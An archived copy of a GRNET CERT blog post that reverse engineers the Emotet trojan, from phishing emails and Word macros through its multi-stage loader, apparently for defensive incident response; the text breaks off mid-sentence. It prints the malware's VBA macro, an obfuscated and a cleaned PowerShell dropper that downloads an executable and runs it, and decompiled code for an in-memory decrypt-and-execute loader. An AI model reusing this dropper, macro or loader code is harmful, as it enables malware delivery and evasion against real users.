{
	"id": "38411aa3-15f5-4bd3-9bb3-415ceb7ae68d",
	"created_at": "2026-04-06T00:13:18.967259Z",
	"updated_at": "2026-04-10T03:21:37.032679Z",
	"deleted_at": null,
	"sha1_hash": "075b2620cdc687cb3b82d4eb438c3f3a9a97667d",
	"title": "Reverse engineering Emotet – Our approach to protect GRNET against the trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6343970,
	"plain_text": "Reverse engineering Emotet – Our approach to protect GRNET\r\nagainst the trojan\r\nBy Marios Levogiannis\r\nArchived: 2026-04-05 18:50:35 UTC\r\nTable of Contents\r\nPreamble\r\nChapter 1. From the e-mails to the binaries\r\nIntroduction\r\nThe e-mails\r\nThe MS Word documents\r\nThe VBScript Macros\r\nThe PowerShell script\r\nChapter 2. From the protector to the trojan\r\nIntroduction\r\nThe executable files\r\nThe decrypted resource\r\nThe nested executable\r\nChapter 3. Overcoming the malware obfuscation techniques\r\nIntroduction\r\nSymbol Resolution Obfuscation\r\nString Obfuscation\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 1 of 51\n\nControl Flow Obfuscation\r\nChapter 4. The trojan’s internals\r\nIntroduction\r\nMain flow overview\r\nPersistence mechanisms\r\nCommand-and-Control\r\nRequest Payload\r\nRequest\r\nHTTP request-response\r\nResponse\r\nResponse Payload\r\nChapter 5. Monitoring the updates\r\nIntroduction\r\nDeveloping a custom “Emotet” client\r\nAutomating repeated reverse-engineering processes\r\nEpilogue\r\nPreamble\r\nIn October 2020 we observed an outbreak of malicious e-mails reaching GRNET employees’ inboxes. Meanwhile,\r\nsimilar campaigns were also targeting several public and private sector organizations in Greece. After acquiring\r\ndozens of such e-mails, we started planning our defensive strategy. To do so, we started analyzing the malware\r\nthat was attached to the emails and realized that were dealing with the infamous Emotet trojan.\r\nIn this document, we describe the steps of our analysis including the reverse engineering process of the malware\r\nexecutables, how we overcame the binary obfuscation techniques it employed, and how we determined the\r\nmalware’s internals. In the course of our work, we were able to discover the list of IP addresses that constituted\r\nthe network of Command-and-Control (C2) servers of Emotet. This information was very useful because we\r\nutilized it to detect any network connections from the GRNET network to the Emotet C2 network. Such\r\nconnections  would indicate a potential compromised workstation in our premises. Overall, the goals of our\r\nanalysis were to (a) create an infrastructure that received new updates of the Emotet trojan and keep our list of C2\r\nIP addresses up-to-date and (b) understand the trojan’s persistence mechanism to perform forensic invastigations\r\non compromised workstations.\r\nOn January 27, 2021 Europol announced that it had completely taken down Emotet. The same day our update-monitoring infrastructure received an update which was Europol’s clean-up payload scheduled to be executed on\r\nApril 25, 2021 at 12:00 p.m.. Hopefully, this will be the last time that we hear about Emotet. Meanwhile, we had\r\nbeen working on analyzing Emotet up to the time of Europol’s announcement. We release our analysis results\r\nhoping that IT professionals will find them useful when trying to protect against similar trojans in the future.\r\nIn Chapter 1 we describe the malicious e-mails and the malware dropper (a macro-enabled MS Word document)\r\ndelivered via those e-mails. If you are already familiar with Emotet’s dropper you may directly skip to the next\r\nchapters. In Chapter 2 we analyze the malware’s multi-layer Protector responsible for unpacking, decrypting and\r\nrunning the trojan for the first time. In Chapter 3 we describe the binary obfuscation techniques incorporated in\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 2 of 51\n\nthe trojan itself as well as the ways to bypass them. In Chapter 4 we provide an in-depth description of the trojan’s\r\ninner-workings, its persistence mechanism, the communication with the Command-and-Control servers network\r\nand the way we discovered the C2 network. Finally, in Chapter 5 we briefly describe the process we followed to\r\nretrieve and analyze new payloads served by the C2 network.\r\nWe have published the de-compiled code of referenced functions as well as the utilities that we implemented\r\nduring the analysis in a GitHub repository.\r\nThis work was carried out under the supervision of GRNET’s Chief Information Security Officer, Dimitris\r\nMitropoulos.\r\nDimitris Kolotouros – Head of IT Security Department, GRNET\r\nMarios Levogiannis – Senior IT Security Engineer, GRNET\r\nFigure 0. Emotet stages overview\r\nChapter 1. From the e-mails to the binaries\r\nIntroduction\r\nOctober 2020.\r\nSeven months have passed since the first COVID-19 lockdown in Greece. The pandemic finds GRNET with a\r\nlargely broadened IT Security agenda heavily linked with the state’s current digital transformation (involving\r\nseveral new applications being developed and maintained in house). The aforementioned developments, together\r\nwith the work-from-home style that has just arrived, completely redefined the security perimeter and priorities of\r\nGRNET CERT. A new era comes with new challenges.\r\nSomewhere in between the various ongoing tasks, a number of weird looking e-mails that reached GRNET\r\nemployees came to our notice. They all had a similar form, i.e., replies to legitimate mails that either contain a\r\nURL or an encrypted ZIP attachment and its password.\r\nThe e-mails\r\nFirst, to raise awareness, we notified all GRNET employees. Then, we started collecting and analyzing the\r\nsuspicious e-mails. Initially, we inspected their source code looking for similarities.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 3 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 4 of 51\n\nFigure 1. E-mails delivering Emotet dropper via URL (left) and attachment (right)\r\nOur analysis led to several interesting remarks:\r\nAll e-mails were replies to legitimate e-mails. The e-mail subject followed a specific pattern, i.e., “Re:\r\n\u003cORIGINAL MAIL SUBJECT\u003e”. Also, the e-mail body contained the quoted original e-mail body.\r\nThe sender’s display name was altered to be the same with that of the original e-mail.\r\nHowever, the sender’s e-mail address was some unrelated e-mail address (several compromised e-mail\r\naccounts were used).\r\nThe body of the reply contained either a URL or an attachment.\r\nIn the case of the URL, the text contained a legitimate domain name (e.g. gmail.com). Nevertheless,\r\nthe actual target was completely different. Our investigation indicated that they were compromised\r\nwebsites used by the attackers to host the malicious documents.\r\nIn the case of the attachment we observed encrypted ZIP files with the corresponding password\r\ncontained in the reply body. Note that password encrypted attachments are commonly used to\r\nbypass any malware detection running on e-mail servers.\r\nFinally, in all cases we ended up with MS Word documents.\r\nThe MS Word documents\r\nUp to this point, we had already been informed about similar cases affecting other public and private sector\r\norganizations in Greece. Thus, a conventional incident response was not enough; we wanted to further analyze the\r\nmalware.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 5 of 51\n\nOur analysis started with the Word documents. When opening one of the documents, the victim sees a fake pop-up\r\nwindow. In fact, this is just an image inside the document imitating a legitimate pop-up window. In each document\r\nthe fake pop-up window phrasing was different, but in every case it was there to persuade the victim to enable the\r\nMacro execution.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 6 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 7 of 51\n\nFigure2. Fake MS Word pop-ups in Emotet dropper\r\nWe will continue by analyzing one of the MS Word documents. All other documents were similar to the one\r\nexamined; albeit with minor differences.\r\nThe VBScript Macros\r\nTo see what would happen when a user enabled the macros, we examined the corresponding VBScript. The entry-point Document.Open() called function Q4hxwcihtett() of module Iauesnh6lzhaf :\r\nFigure 3. The VBScript macro entry-point\r\nThe function code, as we observe below, was obfuscated:\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 8 of 51\n\nFigure 4. The main VBSript macro module\r\nWe started following the code flow manually to understand it. This manual process revealed that most of the code\r\nwas indeed irrelevant. Specifically, for each meaningful code instruction, the obfuscation process had generated a\r\nbunch of meaningless instructions placed before the meaningful one. So, most of the de-obfuscation effort was to\r\nidentify each block and isolate the meaningful code instruction out of the block.\r\nLuckily enough, the attackers had left some traces that were helpful for us. As we noticed, their obfuscating tool\r\nhad a serious issue (nobody’s perfect). In particular, it did not apply the indentation of the original instruction on\r\nthe instructions of the replacement block. As a result, the original indentation could be found on the first\r\ninstruction of each block. This issue gave us a way to automatically detect the blocks and isolate the last\r\ninstruction of each block, which we knew it was the meaningful instruction of the block.\r\nThe following obfuscation techniques were identified:\r\nDeliberate run-time errors in junk instructions (which were ignored because of the On Error Resume Next\r\nstatement),\r\nString construction using one or more of the following:\r\nString concatenation,\r\nUse of undefined variables that resolve to empty strings,\r\nString replacements with the Replace() function,\r\nConversion of ASCII codes to strings with the ChrW() function,\r\nRetrieval of values from hidden user form control elements,\r\nAlteration between upper and lower case letters in symbol names, exploiting the case insensitivity of\r\nWindows OS,\r\nUse of the line-continuation character _ to break statements in multiple lines.\r\nThen, we only had to manually de-obfuscate some lines of code (the original number of lines was a little more\r\nthan 400). The result was the following:\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 9 of 51\n\n01: Rem Attribute VBA_ModuleType=VBADocumentModule\r\n02: Option VBASupport 1\r\n03: Private Sub Document_open()\r\n04: Set storyRange = ThisDocument.StoryRanges.Item(1)\r\n05: Set commandLine = Mid(storyRange, 5, Len(storyRange))\r\n06: commandLine = Replace(commandLine, \"][ 1) jjkgS [] []w\", Empty)\r\n07: Set objProcess = CreateObject(\"winmgmts:Win32_Process\")\r\n08: Set objProcessStartup = CreateObject(\"winmgmts:Win32_ProcessStartup\")\r\n09: objProcessStartup.ShowWindow = 0\r\n10: objProcess.Create commandLine, Empty, objProcessStartup\r\n11: End Sub\r\nHence, we were able to answer an important question: “What happens when the user executes this macro?”\r\nWell, it spawns a process calling the Win32_Process.Create() method (line 10). The startup information\r\nparameter says “do not show a window” (line 9). Further, the command line parameter holds the command that\r\nwill be invoked by the spawned process. As we can observe in the code, the command is already in the document\r\n(lines 4-5) together with some junk that is removed (line 6).\r\nSo there was something more in the document itself apart from the fake popup window.\r\nThe PowerShell script\r\nFirst, we removed the formatting. In this way we revealed a paragraph that was kept out of the victim’s sight (it\r\nwas formatted with a font size of 2px and a white font color):\r\nFigure 5. Obfuscated PowerShell command hidden in document body\r\nThis looked obfuscated, too. But we already know how to de-obfuscate it, i.e. Replace(commandLine, \"][ 1)\r\njjkgS [] []w\", Empty) :\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 10 of 51\n\nFigure 6. De-obfuscated PowerShell command\r\nThe result would attempt to run a PowerShell script that is encoded in base64 format. We decoded it to discover\r\nthe actual PowerShell script:\r\nFigure 7. Base64-decoded PowerShell script\r\nAfter performing a proper indentation, i.e. split lines on each ‘ ; ‘ and perform indentations on code blocks ‘ { ‘\r\nand ‘ } ‘, we got the following:\r\n$1D2 =[tYpE](\"{3}{1}{4}{5}{0}{2}\"-f 'ecTo','SteM.','Ry','sy','Io.','diR');\r\n$tJ8m4B =[TYpe](\"{2}{4}{5}{1}{3}{0}\"-f 'r','iNTmAnAg','sYsteM.nE','e','T','.SerVIcEpO') ;\r\n$Ysa212g=('N'+('b7ib0'+'0'));\r\n$S95cz34=$I0phsdk + [char](64) + $Ixdbxto;\r\n$Qdfg2cp=(('Chns'+'7')+'2'+'d');\r\n(dIR variABle:1D2).valuE::\"CR`eAteDir`ectory\"($HOME + ((('8U'+'L')+('Pj'+'q')+('6t3'+'_8UL'+'Jvn'+'k')+('7'+'yk'\r\n$Qo08jci=('F'+'5'+('ocx'+'ex'));\r\n( ITEM vARIAblE:Tj8M4B ).VAlUe::\"SeC`U`RI`TyPRoTOc`OL\" = (('Tl'+'s1')+'2');\r\n$R7w053i=(('Nue'+'l2')+'4'+'k');\r\n$Tedbr00 = ('N'+'1p'+('jur'+'3u'));\r\n$H_8yni0=('J6'+'a'+('f'+'fv6'));\r\n$Roz09dp=('V'+('t9'+'1oph'));\r\n$Glkvf7b=$HOME+(('{0'+'}Pjq6'+'t'+'3_'+'{0'+'}Jvnk7yk{0}') -F[Char]92)+$Tedbr00+('.e'+'xe');\r\n$Ads4mxg=(('E'+'2n')+'0j'+'qo');\r\n$Q4b1g5n=.('new-o'+'b'+'jec'+'t') nEt.WEBcLieNt;\r\n$Boiep01=((('ht'+'tp:]['+' ')+'1'+((') '))+'jj'+(('kgS [] []w'+']['+' 1)'+' '))+('jj'+'kgS []')+(' []wi'+'nnh')+\r\n$Q9eccc5=(('F'+'o4')+'g'+('2'+'rk'));\r\nforeach ($S7m_bsh in $Boiep01){\r\n try{\r\n $Q4b1g5n.\"d`oWnL`Oa`DfIlE\"($S7m_bsh, $Glkvf7b);\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 11 of 51\n\n$E4fktea=('D'+'li'+('0'+'4n_'));\r\n If ((\u0026('Get'+'-Ite'+'m') $Glkvf7b).\"l`e`Ngth\" -ge 47912) {\r\n ([wmiclass]('wi'+('n'+'32')+'_P'+('r'+'ocess'))).\"CR`e`AtE\"($Glkvf7b);\r\n $Klmmlcr=(('V6z'+'43'+'q')+'d');\r\n break;\r\n $Myse8pt=('S8'+('266j'+'7'))\r\n }\r\n } catch{\r\n \r\n }\r\n}\r\n$Xwnf9b5=('R_'+('1kl'+'w')+'o')\r\nWe then noticed some common obfuscation techniques:\r\nString formatting to scramble string elements (e.g. {3}{1}{4}{5}{0}{2}\"-f\r\n'ecTo','SteM.','Ry','sy','Io.','diR' ),\r\nInsertions of the word-wrap operator ( ` ) in symbol names (e.g. d`oWnL`Oa`DfIlE ),\r\nAlteration between upper and lower case letters in symbol names exploiting the case insensitivity of\r\nWindows OS (e.g. nEt.WEBcLieNt ),\r\nString construction with concatenation and junk removal with the Replace() method,\r\nUse of undefined variables in string concatenations that actually act as empty strings, and\r\nInsertion of irrelevant code instructions.\r\nWe then used a PowerShell interpreter to evaluate strings and after removing irrelevant instructions and renaming\r\nthe variables, we had the de-obfuscated code:\r\nSystem.IO.Directory::CreateDirectory($HOME + \"\\\\Pjq6t3_\\\\Jvnk7yk\\\\\");\r\nSystem.Net.ServicePointManager::SecurityProtocol = \"Tls12\";\r\n$filepath = $HOME + \"\\\\Pjq6t3_\\\\Jvnk7yk\\\\N1pjur3u.exe\";\r\n$webclient = New-Object System.Net.WebClient;\r\n$urls = \"http://in*******hn.com/wp-admin/sA/\",\r\n \"http://sh*******se.com/wp-includes/ID3/IDz/\",\r\n \"http://blog.ma********ck.com/wp-admin/Spq/\",\r\n \"https://www.fr*********id.com/wp-content/g/\",\r\n \"https://pe********ed.com/vmware-unlocker/daC/\",\r\n \"https://me*******rm.com/wp-admin/Lb/\",\r\n \"http://ie*******bc.com/cow/2BB/\";\r\nforeach ($url in $urls) {\r\n try {\r\n $webclient.DownloadFile($url, $filepath);\r\n If ((Get-Item $filepath).Length -ge 47912) {\r\n ([wmiclass](\"Win32_Process\")).Create($filepath);\r\n break;\r\n }\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 12 of 51\n\n} catch {}\r\n}\r\nThe outcome was a script that was pretty simple. Actually, it attempts to download an executable file from several\r\nURLs and store it in the following path: $HOME\\Pjq6t3_\\Jvnk7yk\\N1pjur3u.exe (the URLs and the path were\r\ndifferent in each Word document). The size of each downloaded file is checked against a minimum value to ensure\r\nthat if the executable has been removed from the compromised website, the 404 HTML page will be ignored and\r\nthe next URL will be tried. When a file has been downloaded, it gets executed in a new process by calling the\r\nWin32_Process.Create() method.\r\nAfter following the same de-obfuscation procedure on every Word document available, we fetched the actual\r\nmalware executables from the URLs described in the PowerShell scripts. To do so, we imitated the PowerShell\r\nUser-Agent in a way; we needed to look like a malicious PowerShell script after all!\r\nPS. During the course of our analysis we came across several compromised e-mail accounts and websites. In all\r\ncases, we sent abuse reports to the corresponding abuse contacts informing them of their compromised assets.\r\nChapter 2. From the protector to the trojan\r\nIntroduction\r\nIn the previous chapter we documented the detection and preliminary analysis of a malware that was distributed\r\nvia e-mails. We saw that the e-mails included an MS Word document with macros that spawn a new process\r\nrunning a PowerShell script in the victims machine. We also observed that the PowerShell script spawns one more\r\nprocess running an executable file downloaded from the Internet. Finally, we downloaded several of those\r\nexecutable files.\r\nWith the executable files at hand, we wanted to examine their internals without running them. Thus, we continued\r\nwith our reverse engineering process. At this point we started working with Ghidra, a free, open-source, reverse\r\nengineering tool that was released last year.\r\nThe executable files\r\nFirst, we loaded some of the executable files and observed that they were PE (Portable Executable) files compiled\r\nfor the x86 LE architecture.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 13 of 51\n\nFigure 8. Emotet Protector’s architecture details\r\nWe started looking for meaningful data such as imported symbols and defined strings. To our surprise we\r\nobserved a number of different programs. Also, we noticed that in every executable file there was one defined\r\nstring looking like a random key.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 14 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 15 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 16 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 17 of 51\n\nFigure 9. Random keys in various Emotet Protectors’ strings\r\nApart from that, all the other strings seemed to differ between the executable files. Assuming that this is not a\r\ncoincidence, we looked for references to these strings in the de-compiled code. While looking, we noticed one\r\nmore similarity: although the surrounding code also seemed to differ between the executable files, there was an\r\nidentical code pattern that consumed the alleged key.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 18 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 19 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 20 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 21 of 51\n\nFigure 10. Code referencing the keys in various Protectors\r\nWe reverse engineered this part of the code, and ended up with the following code:\r\nWPARAM FUN_00407b2e(HINSTANCE param_1,int param_2)\r\n \r\n{\r\n byte *resourceBuffer;\r\n _LDR_RESOURCE_INFO resourceInfo;\r\n _IMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry;\r\n void *resource;\r\n word iv;\r\n dword resourceSize;\r\n...\r\n resource = (void *)0x0;\r\n resourceSize = 0;\r\n resourceInfo.Type = 10;\r\n resourceInfo.Name = 0x1e55;\r\n resourceInfo.Language = 0x409;\r\n...\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 22 of 51\n\n_LdrFindResource_U_PTR = GetProcAddress(s_ntdll_Module2,s_LdrFindResource_U_0040d8cc);\r\n...\r\n _LdrAccessResource_PTR = GetProcAddress(s_ntdll_Module2,s_LdrAccessResource_0040d8b4);\r\n iVar3 = (*_LdrFindResource_U_PTR)(0x400000,\u0026resourceInfo,3,\u0026ResourceDataEntry);\r\n if (-1 \u003c iVar3) {\r\n (*_LdrAccessResource_PTR)(0x400000,ResourceDataEntry,\u0026resource,\u0026resourceSize);\r\n }\r\n resourceBuffer = (byte *)VirtualAlloc((LPVOID)0x0,resourceSize,0x1000,0x40);\r\n memcpy(resourceBuffer,resource,resourceSize);\r\n DeriveKey(s_*FLrY4bO%4Th$J8Gt0z*zKiB)Yb#mGNy_0040d5b4,0x57,(uint)\u0026iv);\r\n DecryptResource(resourceBuffer,resourceSize,\u0026iv);\r\n (*(code *)resourceBuffer)();\r\n...\r\n}\r\nThe code above has the following functionality:\r\nAllocates an executable memory region with VirtualAlloc() , where 0x40 corresponds to\r\nPAGE_EXECUTE_READWRITE protection level,\r\nloads a specific resource from the executable’s resources into this region,\r\nderives a decryption key from the previously mentioned main key,\r\ndecrypts the contents of the resource using the derived key, and finally,\r\nuses the reference to the decrypted data as a function pointer and calls the function.\r\nIn deriveKey.c and decryptResource.c we include the reverse engineered code of the functions.\r\nThe attackers hid the actual payload in the resource described by the following  RESOURCE_INFO variable:\r\nresourceInfo.Type = 10;\r\nresourceInfo.Name = 0x1e55;\r\nresourceInfo.Language = 0x409;\r\nWe found the payload in the resources section of the executable file, just below this mouse icon:\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 23 of 51\n\nFigure 11. The encrypted payload in Emotet Protector’s resources\r\nAt that point we had the encrypted payload, the main key, the key derivation function and the decryption function.\r\nThe only thing left was to decrypt the payload. So we reused the reversed engineered  DeriveKey() and\r\nDecryptResource() functions to write a small decryption tool. After that we were able to decrypt the resource.\r\nThe decrypted resource\r\nLoading the decrypted resource in Ghidra was not just a drag-n-drop task. Apparently, there were no executable\r\nheaders to let Ghidra infer the architecture details. However, we knew that this payload was loaded in the memory\r\nspace of the initial executable so we only had to define the architecture to be the same as the initial executable.\r\nFurthermore, we knew that the executable starts with a function (the pointer to the memory was handled as a\r\nfunction pointer as previously described). With a little manual work, we managed to analyze the payload with\r\nGhidra:\r\nFigure 12. The decrypted resource’s entry-point\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 24 of 51\n\nAs shown above, the code pushes some values in the stack and then calls function FUN_0000002d() . The values\r\npushed in the stack must be the function arguments. Among these values we noticed 0x529 and 0x31529 which\r\nGhidra analyzed as memory references ( DAT_0000052e and DAT_0003152e ).\r\nDAT_0003152e contains the last 5 bytes of the executable representing the null-terminated string “ dave ” that\r\nlooked like a magic value.\r\nFigure 13. The referenced DAT_0003152e in decrypted resource\r\nDAT_0000052e was more interesting. The first two bytes were the printable characters “MZ”. As you probably\r\nknow this is the header signature of DOS MZ executables. This was a very good lead.\r\nThe file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the beginning of the file\r\n(the “magic number”). “MZ” are the initials of Mark Zbikowski, one of leading developers of MS-DOS.\r\nWikipedia\r\nFigure 14. The MZ magic value in the decrypted resource\r\nBy further examining the contents of DAT_0000052e , we identified some known MS-DOS stub strings, such as\r\nthe “This program cannot be run in DOS mode”. Of course this resembles a PE executable.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 25 of 51\n\nFigure 15. The MS-DOS stub in the decrypted resource\r\nWe went on reversing the FUN_0000002d() function assuming that its first argument is a reference to a PE\r\nexecutable.\r\nThe first difficulty was the mysterious function named FUN_00000456() . This function is invoked several times at\r\nthe beginning of FUN_0000002d() with a different argument each time. The return values are stored on local\r\nvariables and later on they are used as function pointers. Apparently, the function somehow resolved\r\nthese arguments to function addresses. Thus we needed to reverse engineer FUN_00000456() .\r\nFigure 16. Symbol resolving in the decrypted resource’s code\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 26 of 51\n\nExamining FUN_00000456() , we came across a technique for resolving library symbols. Specifically, the function\r\nretrieves the list of loaded libraries ( InLoadOrderModuleList ) from the Process Environment Block (PEB) and\r\nloops over each exported symbol of each library. On each loop a combined hash (32-bit value) of the library name\r\nand symbol name is calculated. If this value matches the function argument, a pointer to the address of the\r\ncorresponding function is returned (in resolveImportByHash.c we include the reverse engineered code of the\r\nfunction). As soon as we understood the internals of the hashing mechanism, we wrote a short script,\r\ngenerate_symbol_hashes1.py, that calculates these hash values for every symbol of several common libraries\r\n( ntdll.dll , kernel32.dll , etc) and exports them to a proper (and long) C enumeration:\r\nFigure 17. Calculated symbol hashes enumeration\r\nAfter importing the generated enum in our Ghidra project (and properly retyping the function), we had a clear\r\nview of which library functions are called later on:\r\nFigure 18. Reverse engineered symbol resolving\r\nWe were now able to continue reversing the FUN_0000002d() function. After some good amount of analysis we\r\nconcluded that the function is a pretty basic binary image loader with the following function signature (in\r\nloadBinary.c we include the complete reverse engineered code):\r\nbyte * loadBinary(byte *pe_ptr,byte *functionToRunHash,byte *functionToRunParam1, int functionToRunParam2,int c\r\nInternally, the function:\r\nallocates the memory buffer (in which the image will be loaded) with VirtualAlloc() ,\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 27 of 51\n\ncopies the headers from the source image,\r\ncopies the sections from the source image,\r\nloads and links the imported symbols (libraries),\r\napplies the relocations,\r\napplies proper memory protection to each section with VirtualProtect() (that way the executable\r\nsections of the loaded binary will be in executable memory sections),\r\nruns the executable’s entry-point,\r\nruns an exported symbol, the name of which matches the functionToRunHash hash value, passing the\r\nparameters functionToRunParam1 and functionToRunParam2 ,\r\nreturns a pointer to the allocated buffer.\r\nThe code at the beginning of the encrypted payload could now be translated into something meaningful:\r\nFigure 19. Reverse engineered entry-point\r\nIn this way, we knew that the executable included at address 0x0000052e will be loaded. Then, the entry-point is\r\ninvoked:\r\nFigure 20. Reverse engineered code running the nested binary\r\nWhen the entry-point returns, its exported symbol, i.e., an exported function with a name matching the\r\n0xed1c7b90 hash value, will run.\r\nWe exported the executable included at address 0x0000052e in a separate file and loaded it into Ghidra.\r\nThe nested executable\r\nWe loaded the nested executable in Ghidra and went straight to the entry-point. The entry-point just calls a\r\nfunction with a couple of parameters.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 28 of 51\n\nFigure 21. The nested executable’s entry-point\r\nYou might wonder what is this DAT_10004070 value. So did we. As a result, we had a quick look into its contents:\r\nFigure 22. MZ magic value in the nested executable\r\nThat “MZ” signature on the right looks familiar, doesn’t it? Well, this is another nested PE executable! It was like\r\nopening a matryoshka doll.\r\nWe reverse engineered the FUN_10001000() function and, as you can probably guess, it was yet another binary\r\nimage loader with the following function signature:\r\nstruct_paramContainer * __cdecl loadBinary(byte *pe_ptr,uint pe_size)\r\nInternally, it performs the following tasks:\r\nallocates the memory buffer (in which the image will be loaded) with VirtualAlloc() ,\r\ncopies the headers from the source image,\r\nfixes the relocation table entries according to the offset between the allocated buffer address and the\r\nImageBase ,\r\nloads and links the imported symbols (libraries),\r\ncopies the sections from the source image and applies proper memory protection to each section with\r\nVirtualProtect() (that way the executable sections of the loaded binary will be in executable memory),\r\ninitializes the Thread Local Storage (TLS) according to the image TLS Section,\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 29 of 51\n\nmodifies the base addresses ( ImageBaseAddress and  LoaderData-\u003eInLoadOrderModuleList-\u003eDllBase ) of\r\nProcess Environment Block (PEB) so that they point to the allocated buffer,\r\nruns the executable’s entry-point.\r\nFigure 23. Reverse engineered code running the actual trojan\r\nOnce again we exported the executable included at address 0x10004070 in a separate file that we had to explore.\r\nChapter 3. Overcoming the malware obfuscation techniques\r\nIntroduction\r\nIn the previous chapter, we explored the steps until the actual trojan is executed. We observed that the downloaded\r\nexecutable, decrypts part of itself and executes the second stage payload. This payload in turn, executes another\r\npayload, i.e. the executable that we will analyze in this chapter and Chapter 4.\r\nIn this Chapter, we’ll fast-forward and describe the obfuscation techniques employed by the latter executable. This\r\nwill provide us with the necessary background to further explain its functionality in Chapter 4.\r\nSymbol Resolution Obfuscation\r\nThe first thing that we noticed after loading the executable in Ghidra was that it does not import any symbols. In\r\nparticular, it is not feasible for an executable of only 369 KB, to have a Windows API implementation statically\r\nlinked. Hence, it became obvious that it was probably using a custom mechanism to resolve symbols from system\r\nlibraries.\r\nFigure 24. Emotet trojan’s Symbol Tree\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 30 of 51\n\nStarting from the entry-point, we noticed the following lazy initialization pattern, the result of which is stored in a\r\nglobal variable and is used as a function pointer. The same pattern (and some variations of it) is used all over the\r\nexecutable.\r\nFigure 25. Symbol resolving in Emotet trojan’s entry-point\r\nCould this be the custom symbol resolution mechanism employed by the trojan to hide the APIs that it uses? To\r\nfind out, we reversed engineered functions FUN_00404190() and FUN_004040f0() . Indeed, these two functions\r\nwork almost like FUN_00000456() described in Chapter 2:\r\nFUN_00404190() starts from the Thread Information Block (the address of which is available from the\r\nFS segment register on 32-bit Windows), accesses the Process Environment Block (PEB) and iterates\r\nover the list of loaded modules ( InLoadOrderModuleList ). For each module, it calculates the hash of its\r\nlower-cased name and compares it against the specified parameter. If they match, the function returns the\r\nmodule’s base address. Essentially, it works like GetModuleHandle() , but instead of specifying the\r\nmodule’s name, the caller specifies the module name’s hash.\r\nFUN_00000456() parses the module specified in the first parameter to find its export table and iterates over\r\nthe exported symbols. For each exported symbol, it calculates the hash of its name and compares it against\r\nthe value specified in the second parameter. If they match, it either returns the address that the symbol\r\npoints to (if the symbol is an export) or recursively resolves the symbol forwarded from another module (if\r\nthe symbol is a forwarder).\r\nThis technique is called API Hashing. In findModuleByHash.c and findModuleExportByHash.c we include the\r\nreverse engineered code of the functions.\r\nAgain, we wrote a short script, generate_symbol_hashes2.py, that calculates the hashes for every symbol of some\r\ncommon libraries (e.g. ntdll.dll , kernel32.dll , etc.) and exports them to two C enumerations:\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 31 of 51\n\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 32 of 51\n\nFigure 26. Calculated library and symbol names hashes enumerations\r\nAfter importing the enumerations in Ghidra, we had a clear view of the modules and functions imported by these\r\ncalls.\r\nFigure 27. Emotet trojan’s reverse engineered symbol resolving\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 33 of 51\n\nString Obfuscation\r\nWe noticed that the binary did not contain any strings. This made us suspicious because it is impossible for an\r\nexecutable that performs a meaningful functionality, not to contain any strings. As a result, we assumed that some\r\nkind of string obfuscation is used. The following is the full list of the strings that we identified.\r\nFigure 28. List of defined strings in Emotet trojan\r\nThe first time we met the use of a string was in a call to LoadLibraryW() , the only parameter of which is the\r\nname of the library to be loaded. The value passed to  LoadLibraryW() is returned from function\r\nFUN_004035f0() , which in this case operates on binary data at memory address 0x40d7f0 . It became apparent\r\nthat this function must be doing some kind of transformation (see decryption) to the data pointed to by its input.\r\nFigure 29. Emotet trojan’s call of string decryption function\r\nWe reversed engineered the function and we confirmed our guess, its purpose is to decrypt the input binary data to\r\na Unicode string. The first 4 bytes of the binary data are the XOR key, the next 4 bytes are the string’s encrypted\r\nlength and the rest are encrypted string itself. After decrypting the length, the function iterates over all quadruples\r\nof encrypted characters (remember that the key is 4 bytes long) until all have been decrypted.\r\nhttps://cert.grnet.gr/en/blog/reverse-engineering-emotet/\r\nPage 34 of 51\n\nFigure 30. Emotet trojan’s string decryption internals\r\nFor the sake of completeness, in decryptWideString.c we included the reverse engineered code of that function.\r\nTwo more versions of this 